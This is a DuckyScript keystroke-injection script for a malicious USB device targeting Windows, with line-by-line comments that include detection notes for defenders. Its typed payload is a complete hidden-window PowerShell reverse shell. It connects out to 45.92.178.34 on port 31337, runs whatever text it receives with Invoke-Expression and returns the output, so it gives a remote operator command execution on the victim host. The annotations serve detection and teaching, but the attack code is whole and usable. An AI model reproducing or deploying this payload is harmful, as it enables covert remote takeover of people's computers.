REM Keystroke-injection (USB HID) script in DuckyScript syntax, targeting Windows.
REM Sequence: open the Run dialog, start PowerShell with a hidden window, then type
REM a PowerShell TCP client loop that connects out to 45.92.178.34:31337, runs each
REM piece of text it receives with iex, and writes the output back over the socket.
REM Defender view: the observable points are the powershell.exe launch with
REM "-W Hidden", the outbound connection to the address/port above, and the iex
REM loop content; device-control policy for unknown USB keyboards is the
REM preventive control for this delivery method.
REM Initial pause of 1500 ms before the first keystroke is sent.
DELAY 1500
REM Windows key + R: opens the Run dialog on Windows. Text entered there is
REM normally recorded under the user's Explorer RunMRU registry key, which is a
REM useful forensic artifact for this kind of injection.
GUI r
DELAY 500
REM Types the PowerShell launch line. -NoP, -NonI and -W Hidden abbreviate
REM -NoProfile, -NonInteractive and -WindowStyle Hidden, so no window stays visible.
REM Detection: process-creation logging with command lines (Security 4688 with
REM command-line auditing, or Sysmon Event ID 1) shows powershell.exe started from
REM explorer.exe with these flags.
STRING powershell -NoP -NonI -W Hidden -Command
DELAY 250
REM Submits the text typed into the Run dialog.
ENTER
DELAY 200
REM Typed PowerShell: opens an outbound TCP connection from the host to
REM 45.92.178.34 port 31337 (hard-coded; both values are indicators to search for).
REM Detection: network-connection telemetry attributed to powershell.exe
REM (e.g. Sysmon Event ID 3) and egress filtering on non-standard ports.
STRING $client = New-Object System.Net.Sockets.TCPClient("45.92.178.34", 31337);
DELAY 100
REM Typed PowerShell: takes the connection's stream object used for all later
REM reads and writes.
STRING $stream = $client.GetStream();
DELAY 100
REM Typed PowerShell: allocates a 65536-element byte array filled with zeros,
REM used as the receive buffer.
STRING [byte[]]$buffer = 0..65535|%{0};
DELAY 100
REM Typed PowerShell: defines Set-CultureWin, which sets the current thread's
REM CurrentUICulture and CurrentCulture, calls it with en-US, then evaluates the
REM current culture so it is printed. The purpose is not stated on the page;
REM presumably it forces English-language output - unconfirmed.
STRING function Set-CultureWin([System.Globalization.CultureInfo] $culture) { [System.Threading.Thread]::CurrentThread.CurrentUICulture = $culture ; [System.Threading.Thread]::CurrentThread.CurrentCulture = $culture } ; Set-CultureWin en-US ; [system.threading.thread]::currentthread.currentculture
DELAY 100
REM Typed PowerShell: start of the receive loop. Each pass reads up to the buffer
REM length from the stream; the loop ends when Read returns 0.
STRING while(($bytesRead = $stream.Read($buffer, 0, $buffer.Length)) -ne 0) {
DELAY 100
REM Typed PowerShell: decodes the received bytes (only the $bytesRead that were
REM read) as ASCII text.
STRING $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($buffer,0, $bytesRead);
DELAY 100
REM Typed PowerShell: iex (Invoke-Expression) runs the received text as PowerShell,
REM merges the error stream into the output (2>&1) and captures it as one string.
REM This is the point where remotely supplied text becomes code on the host.
REM Detection: where enabled, PowerShell Script Block Logging (Event ID 4104) and
REM AMSI see the evaluated content.
STRING $sendback = (iex $data 2>&1 | Out-String );
DELAY 100
REM Typed PowerShell: appends a prompt of the form "PS <current directory>> " to
REM the captured output.
STRING $sendback2 = $sendback + "PS " + (pwd).Path + "> ";
DELAY 100
REM Typed PowerShell: encodes the reply as ASCII bytes. No encryption is applied
REM anywhere in this script, so the traffic is plaintext on the wire and readable
REM by network inspection.
STRING $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
DELAY 100
REM Typed PowerShell: writes the encoded reply to the stream.
STRING $stream.Write($sendbyte, 0, $sendbyte.Length);
DELAY 100
REM Typed PowerShell: flushes the stream after the write.
STRING $stream.Flush()
DELAY 100
REM Typed PowerShell: closes the receive loop body.
STRING };
DELAY 100
REM Typed PowerShell: closes the TCP client once the loop has ended.
STRING $client.Close()
DELAY 100
REM Sends Enter after the last typed line.
ENTER